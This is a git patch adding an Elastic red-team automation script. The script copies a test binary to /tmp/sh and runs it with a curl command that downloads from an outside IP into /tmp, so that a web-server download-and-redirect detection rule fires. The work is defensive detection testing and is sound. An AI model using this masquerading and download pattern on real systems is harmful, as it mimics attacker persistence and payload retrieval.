From c336e30deea1252b1ff8312f478b0ddc1cbde76e Mon Sep 17 00:00:00 2001 From: protections machine <72879786+protectionsmachine@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:25:10 +1100 Subject: [PATCH] Sync RTA Suspicious Download and Redirect by Web Server (#4194) Co-authored-by: shashank-elastic <91139415+shashank-elastic@users.noreply.github.com> --- ...webserver_curl_wget_suspicious_redirect.py | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py diff --git a/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py b/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py new file mode 100644 index 000000000..d32448ceb --- /dev/null +++ b/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py @@ -0,0 +1,40 @@ +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0; you may not use this file except in compliance with the Elastic License +# 2.0. + +import sys +from . import RtaMetadata, common + +metadata = RtaMetadata( + uuid="a153dec0-914a-4a03-8b6c-a24e55b6f16a", + platforms=["linux"], + endpoint=[ + { + "rule_name": "Suspicious Download and Redirect by Web Server", + "rule_id": "fa71e336-0177-4732-b58b-53eb4a87a286", + }, + ], + techniques=["T1505", "T1059", "T1071"], +) + + +@common.requires_os(*metadata.platforms) +def main() -> None: + common.log("Creating a fake executable..") + masquerade = "/tmp/sh" + + source = common.get_path("bin", "linux.ditto_and_spawn") + common.copy_file(source, masquerade) + common.log("Granting execute permissions...") + common.execute(["chmod", "+x", masquerade]) + + commands = [masquerade, '-c', 'curl http://8.8.8.8:53/foo > /tmp/foo && xxd'] + common.execute([*commands], timeout=5, kill=True) + common.log("Cleaning...") + common.remove_file(masquerade) + common.log("Simulation successfull!") + + +if __name__ == "__main__": + sys.exit(main())